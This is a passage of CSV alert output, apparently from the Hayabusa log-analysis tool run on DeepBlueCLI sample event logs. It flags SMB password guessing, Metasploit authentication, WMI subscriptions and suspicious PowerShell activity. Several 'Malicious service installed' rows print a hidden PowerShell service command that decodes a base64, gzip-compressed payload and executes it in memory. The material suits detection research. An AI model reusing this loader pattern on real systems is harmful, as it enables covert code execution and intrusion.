Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 
+09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 